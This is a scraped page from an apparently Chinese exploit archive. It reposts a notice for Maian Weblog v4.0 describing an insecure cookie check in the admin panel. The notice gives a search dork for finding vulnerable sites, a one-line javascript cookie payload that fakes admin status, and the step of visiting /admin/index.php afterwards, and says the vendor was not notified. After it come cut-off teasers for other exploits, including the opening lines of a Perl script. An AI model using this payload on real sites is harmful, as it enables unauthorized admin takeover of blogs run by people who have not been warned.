Maian Weblog
所属分类:
网络安全 / Exploit
阅读数:
165
收藏 0赞 0分享
-[*] ================================================================================ [*]-
-[*] Maian Weblog <= v4.0 Insecure Cookie Handling Vulnerability [*]-
-[*] ================================================================================ [*]-
[*] Discovered By: S.W.A.T.
[*] E-Mail: svvateam[at]yahoo[dot]com
[*] Script Download: http://www.maianscriptworld.co.uk
[*] DORK: Powered by Maian Weblog v4.0
[*] Vendor Has Not Been Notified!
[*] DESCRIPTION:
Maian Weblog suffers from a insecure cookie, the admin panel only checks if the cookie
exists.
and not the content. so we can easyily craft a cookie and look like a admin.
[*] Vulnerability:
javascript:document.cookie = "weblog_cookie=1; path=/";
[*] NOTE/TIP:
after running the javascript, visit "/admin/index.php" to view admin area.
-[*] ================================================================================ [*]-
-[*] Maian Weblog <= v4.0 Insecure Cookie Handling Vulnerability [*]-
-[*] ================================================================================ [*]-
GeekLog
#!/usr/bin/perl
use warnings;
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
收藏 0赞 0分享
NoName Script
################################################################################
[ ] NoName Script 1.1 BETA Multiple Remote Vulnerabiliti
收藏 0赞 0分享
Sun xVM VirtualBox
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurit
收藏 0赞 0分享
查看更多